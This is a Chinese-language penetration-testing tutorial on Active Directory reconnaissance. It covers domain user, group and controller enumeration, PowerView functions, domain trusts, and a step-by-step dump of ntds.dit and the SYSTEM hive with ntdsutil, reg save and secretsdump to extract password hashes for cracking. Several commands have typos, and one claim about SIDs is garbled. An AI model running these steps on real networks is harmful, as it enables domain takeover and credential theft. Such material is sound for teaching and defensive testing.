域内信息搜集

一、判断自己的身份

判断自己的身份最简单的方式就是whoami

如果是本地非域用户的话，就是计算机名称/账号

如果是域内用户账号的话，就是域名称/账号

nslookup -qt=ns lab.com  //定位DC
net time /domain //查看时间服务器
hostname //查看本机名字

二、定位DC及获取用户、组信息

net config workstation //查询当前登陆域及登录的用户信息
net user /domain  //查询域内用户
wmic useraccount get /all 查询域内用户的详细信息
net accounts /domain 查看域的密码策略
net user xxx /domain  查看指定域用户lab的详细信息
net view /domain 查看有几个域
net view /domain:xxx 查看域内的主机
net group /domain 查看域里面的组
net group "domainn users" //查看域用户
net group "domain controllers" /domian 查看域控制器
net group "domain computers" /domain查看域内所有主机
net group "domain admins" /domain查看域管理员，该组内的成员对域控拥有完全控制权
net group "enterprise admins" /domain 查看企业管理组，该组内的成员对域控拥有完全控制权
net group "domain guest" /domain 查看域访客组，权限较低
net accounts /domain #查询域密码策略
whoami /user #查看⽤户SID和域SID

域的sid是500之前的，用户sid是500

当你是域控用户的时候可以输入以下命令查询域内信息

dsquery user #查询⽬录中的⽤户
dsquery computer #查询⽬录中的主机
dsquery group #查询⽬录中的组
dsquery ou #查询⽬录中的组织单元
dsquery site #查询⽬录中的站点
dsquery server #查询域控
dsquery contact #查询⽬录中的联系⼈
dsquery subnet #查询⽬录中的⼦⽹
dsquery quota #查询⽬录中的配额规定
dsquery partition #查询⽬录中的分区
dsquery server –domain lab.com | dsget server–dnsname –site #搜索域内
域控制器的DNS主机名和站点名
dsquery computer domainroot –name -xp –limit n #搜索域内以-xp结尾的机
器n台
dsquery user domainroot –name admin -limit n #搜索域内以admin开头
的⽤户n个

三、登陆历史

最原始的方式是通过注册表里HKEY_USERS的key值来查询谁登录过本机，同样也调用到了 NetSessionEnum API。但是有以下工具可以帮助我们快速查看

1.psloggedon.exe

PsLoggedOn - Windows Sysinternals | Microsoft Docs

此工具用于查看本地登录的用户和通过本地计算机或远程计算机资源登录的用户。

psloggedon.exe \\域名

2.PVEFindADUser.exe

Tools/PVEFindADUser.exe at master · chrisdee/Tools · GitHub

PVEFindADUser.exe -current -target hostname

3.Powerview.ps1

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Import-Module .\PowerView.ps1

powerview.ps1是非常全面的，它有如下命令：

1. Get-NetDomain 获取当前⽤户所在域的名称
2. Get-NetUser 获取所有⽤户的详细信息
3. Get-NetDomainController 获取所有域控制器的信息
4. Get-NetComputer 获取域内所有机器的详细信息
5. Get-NetPrinter 获取域中所有当前计算机对象的数组
6. Get-NetOU 获取域内的OU信息
7. Get-NetGroup 获取所有域内组和组成员的信息
8. Get-NetGroupMember 获取指定域组中所有当前⽤户的列表
9. Get-NetFileServer 根据SPN获取当前域使⽤的⽂件服务器信息
10. Get-NetShare 获取当前域内所有的⽹络共享信息
11. Get-DFSshare 获取域上所有分发⽂件系统共享的列表
12. Get-NetSubnet 获取域的其他⽹段
13. Get-NetSite 获取域内的当前站点
14. Get-NetDomainTrust 获取当前⽤户域的所有信任
15. Get-NetForestTrust 获取与当前⽤户的域关联的林的所有信任
16. Find-ForeignUser 枚举在其主域之外的组中的⽤户
17. Find-ForeignGroup 枚举域组的所有成员并查找查询域之外的⽤户
18. Invoke-MapDomainTrust 尝试构建所有域信任的关系映射
19. Get-NetLoggedon 获取主动登录到指定服务器的⽤户
20. Get-NetLocalGroup 获取⼀个或多个远程主机上本地组的成员
21. Get-NetSession 获取指定服务器的会话
22. Get-NetRDPSession 获取指定服务器的远程连接
23. Get-NetProcess 获取远程主机的进程
24. Get-UserEvent 获取指定⽤户的⽇志
25. Get-ADObject 获取活动⽬录的对象
26. Get-NetGPO 获取域内所有的组策略对象
27. Get-NetGPOGroup 获取域中设置”受限组”的所有GPO
28. Find-GPOLocation 获取⽤户/组，并通过GPO枚举和关联使其具有有效权限的计
算机
29. Find-GPOComputerAdmin 获取计算机并通过GPO枚举确定谁对其具有管理权限
30. Get-DomainPolicy 获取域默认策略或域控制器策略
31. Get-DomainSID 返回指定域的SID
32. Invoke-UserHunter 获取域⽤户登录的计算机信息及该⽤户是否有本地管理员权
限
33. Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定⽤户
34. Invoke-UserEventHunter 根据⽤户⽇志查询某域⽤户登陆过哪些域机器
35. Invoke-ShareFinder 在本地域中的主机上查找（⾮标准）共享
36. Invoke-FileFinder 在本地域中的主机上查找潜在的敏感⽂件
37. Find-LocalAdminAccess 在域上查找当前⽤户具有本地管理员访问权限的计算机
38. Find-ManagedSecurityGroups 搜索受管理的活动⽬录安全组并标识对其具有写
访问权限的⽤户，即这些组拥有添加或删除成员的能⼒
39. Get-ExploitableSystem 发现系统可能易受常⻅攻击
40. Invoke-EnumerateLocalAdmin 枚举域中所有计算机上本地管理员组的成员

四、域信任关系

域信任是为了解决多域环境中的跨域资源共享问题而诞生的。两个域之间必须拥有信任关系，才可以访问到对方域内的资源。任何一个新的子域加入到域树之后。这个域会自动信任其上一层的父域，同时父域也会自动信任新子域，而且这些信任具有双向传递性。由于此信任⼯作是通过Kerberos security protocol来完成的，因为也被成为KerberosTrust。

域信任利⽤DNS服务器定位两个不同⼦域的域控制器，如果两个域中的域控制器都⽆法 找到另⼀个域，那么也就不存在通过域信任关系进⾏跨域资源共享。

域环境不会⽆条件地接收来⾃其他域的凭证，只会接收来⾃受信任的域的凭证。在默认 情况下,特定 Windows域中的所有⽤户都可以通过该域中的资源进⾏身份验证。通过这种⽅式, 域可以为其⽤户提供对该域中所有资源的安全访问机制。如果⽤户想要访问边界以外的资源, 需要使⽤域信任。

域信任关系类型： ● 单向信任 是指在两个域之间创建单向的信任路径，即在⼀个⽅向.上是信任流，在另⼀个⽅向 上是访问流。在受信任域和信任域之间的单向信任中，受信任域内的⽤户或计算机可以访问信 任域中的资源，但信任域内的⽤户却⽆法访问受信任域内的资源。也就是说，若A域信任B 域，那么B域内受信任的主体可以访问A域内信任B域的资源。 ● 双向信任 是指两个单向信任的组合，信任域和受信任域彼此信任，在两个⽅向上都有信任流 和访问流。这意味着，可以从两个⽅向在两个域之间传递身份验证请求。活动⽬录中的所有域 信任关系都是双向可传递的。在创建⼦域时，会在新的⼦域和⽗域之间⾃动创建双向可传递信 任关系。

建⽴信任的⽬的是允许来⾃⼀个域的⽤户访问资源（如服务器上的本地管理员组），嵌套在组 中或以其他⽅式使⽤另⼀个域中的安全主体（例如⽤于 AD 对象 ACL ）。 对此有个例外是域 林内信任（存在于同⼀ Active Directory 林中的域信任）——在林中创建的任何域都与林中的 每个其他域保持隐式双向、可传递的信任关系。

nltest /domain_trusts  //查看域信任信息

五、NTDS.dit导出hash

在活动目录中，所有的数据都保存在域控的ntds.dit文件中。

ntds.dit是一个二进制文件，文件路径为域控的%SystemRoot%\ntds\ntds.dit。NTDS.dit包含不限于用户名、散列值、组、GPP、OU等活动目录的信息。系统运维人员可以使用VSS（Volumn shadow copy servcice，卷映射拷贝服务）。

首先在cmd中创建快照
ntdsutil snapshot "activate instance ntds" create quit quit

使用GUID挂在快照
ntdsutil snapshot "mount {刚才的快照序号}" quit quit

将挂载文件中的ntds.dit复制出来
copy C:\$SNAP_20220220048_VOLUMEC$\windows\ntds\ntds.dit c:\temp\ntds.dit

卸载快照并删除快照
ntdsutil snapshot "mount {序列号}" "delete {序列号}" quit quit

查询当前系统所有快照
ntdsutil snapshot "List All" quit quit

要想得到域的用户名导出信息等，还需要注册表下的system文件

reg save hklm\system c:\system

要想提取ntds.dit的hash也有很多方法，这里就只拿出一点简便的

使用impack工具包下的secretsdump.py

secretsdump.py -system system -ntds ntds.dit LOCAL

然后解出来的hash去解密就好了。